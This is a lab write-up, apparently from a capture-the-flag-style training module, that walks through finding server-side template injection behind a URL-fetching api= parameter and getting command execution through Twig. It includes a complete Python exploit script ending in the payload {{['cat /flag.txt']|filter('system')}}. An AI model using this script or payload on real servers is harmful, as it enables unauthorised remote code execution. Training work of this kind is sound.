Obtain the flag
The page looked like it had lots of functions, but they were dummies.
Examining the request with Burp, I found this:
POST / HTTP/1.1
Host: 94.237.53.146:35348
Content-Length: 45
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://94.237.53.146:35348
Referer: http://94.237.53.146:35348/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
api=http://truckapi.htb/?id%3DFusionExpress02
A POST request with the body parameter api=http://truckapi.htb/?id%3DFusionExpress02, i.e. the server is handed a URL (http://truckapi.htb/?id=FusionExpress02, with the = form-encoded as %3D) and fetches it itself.
The server response:
HTTP/1.1 200 OK
Date: Sun, 09 Mar 2025 09:02:07 GMT
Server: Apache/2.4.62 (Debian)
Content-Length: 55
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"id": "FusionExpress02", "location": "456 Oak Avenue"}
Looks like JSON data, returned from the URL the server fetched for us.
Since this module is about server-side attacks, I inferred this endpoint could be vulnerable to SSTI.
Identification process below (the {{ }} probes were stripped from the page; the standard {{7*7}} and {{7*'7'}} probes are assumed here):
api=http://truckapi.htb/?id%3D${7*7}
NO
api=http://truckapi.htb/?id%3D{{7*7}}
YES
api=http://truckapi.htb/?id%3D{{7*'7'}}
YES
So it’s either Jinja2 or Twig.
Tried a Jinja2-specific payload first; this didn't return anything.
The Twig-specific probe (assumed here to be {{_self}}, since the payload text was stripped from the page) returned "__string_template__0177c07c1ce875b2c81f5871e3da1c28", which is the name Twig gives a template compiled from a string, so it's Twig.
Sent the RCE payload (its text was stripped from the page). It needed to be URL-encoded, and I deleted unnecessary spaces.
For the space, %20 didn't work, so I used %2B (it's a URL-encoded +, which the upstream server decodes to a space when it reads the query string).
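The identification tree and the encoding problem above, as an added example that is not code from the original writeup. It takes the target and the http://truckapi.htb/?id= URL from the captured request; the probe strings are the standard SSTI identification tree, the {{_self}} confirmation and the cat /flag.txt command are assumptions, not the author's actual payloads. The what_upstream_sees() helper simulates both decoding hops offline, which is enough to show why a single %20 breaks the inner URL and why the value has to be encoded twice (or sent as %2B):

```python
"""SSTI probing through the api= fetch, with the double URL-encoding the
writeup needed.  Added example, not the original writeup's code: TARGET and
UPSTREAM come from the captured request; the probe strings are the standard
identification tree; 'cat /flag.txt' is an assumed command."""
import urllib.parse
import urllib.request

TARGET = "http://94.237.53.146:35348/"   # front server, from the capture
UPSTREAM = "http://truckapi.htb/?id="     # URL the front server fetches for us


def inner_url(payload: str) -> str:
    """URL the front server will request on our behalf, with the template
    payload percent-encoded into the id query parameter."""
    return UPSTREAM + urllib.parse.quote(payload, safe="")


def form_body(payload: str) -> str:
    """Outer application/x-www-form-urlencoded body.  The inner URL is encoded
    a second time: the front server form-decodes the body once (%3D -> '='),
    and what remains must still be a valid URL, so a space in the command has
    to be sent as %2520 to reach truckapi.htb as %20."""
    return "api=" + urllib.parse.quote(inner_url(payload), safe=":/?")


def single_encoded_body(payload: str) -> str:
    """The naive version: the payload encoded only once, as the first %20
    attempt in the writeup did."""
    return "api=" + urllib.parse.quote(UPSTREAM + payload, safe=":/?")


def what_upstream_sees(body: str):
    """Simulate both decoding hops offline.  Returns the id value the template
    engine receives, or None when the once-decoded URL contains a raw space
    and is no longer a valid URL (why %20 alone failed)."""
    api = urllib.parse.parse_qs(body)["api"][0]       # front server's form decode
    if " " in api:
        return None
    query = urllib.parse.urlsplit(api).query
    return urllib.parse.parse_qs(query)["id"][0]       # truckapi's query decode


def evaluated(body: str, probe: str, expect: str) -> bool:
    """The engine rendered the probe: expected value present, probe not echoed."""
    return expect in body and probe not in body


def identify_engine(results: dict) -> str:
    """Walk the identification tree from the writeup.  results maps each probe
    string to the raw response body it produced."""
    if evaluated(results.get("${7*7}", ""), "${7*7}", "49"):
        return "${}-syntax engine (Mako/Smarty/FreeMarker family)"
    if not evaluated(results.get("{{7*7}}", ""), "{{7*7}}", "49"):
        return "no SSTI via ${} or {{}}"
    mul = results.get("{{7*'7'}}", "")
    if "7777777" in mul:          # Python repeats the string: Jinja2
        return "Jinja2"
    if "49" not in mul:
        return "{{}} engine other than Jinja2/Twig"
    # Jinja2 or Twig: {{_self}} is Twig-only, and a Twig template compiled
    # from a string is named __string_template__<hash>, as seen in the writeup.
    if "__string_template__" in results.get("{{_self}}", ""):
        return "Twig"
    return "Jinja2 or Twig (confirm with {{_self}})"


def probe(payload: str, timeout: float = 5.0) -> str:
    """POST one double-encoded payload to the target and return the body."""
    req = urllib.request.Request(
        TARGET, data=form_body(payload).encode(), method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    probes = ("${7*7}", "{{7*7}}", "{{7*'7'}}", "{{_self}}")
    results = {p: probe(p) for p in probes}
    engine = identify_engine(results)
    print("engine:", engine)
    if engine == "Twig":
        # Twig's filter() filter calls an arbitrary callable on each element.
        print(probe("{{['cat /flag.txt']|filter('system')}}"))
```

form_body("FusionExpress02") reproduces the captured body exactly, so the same function is used for the benign request and the probes; the only thing that changes between the writeup's failed and working attempts is the second layer of encoding on the inner query string.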
This assessment was rather simple.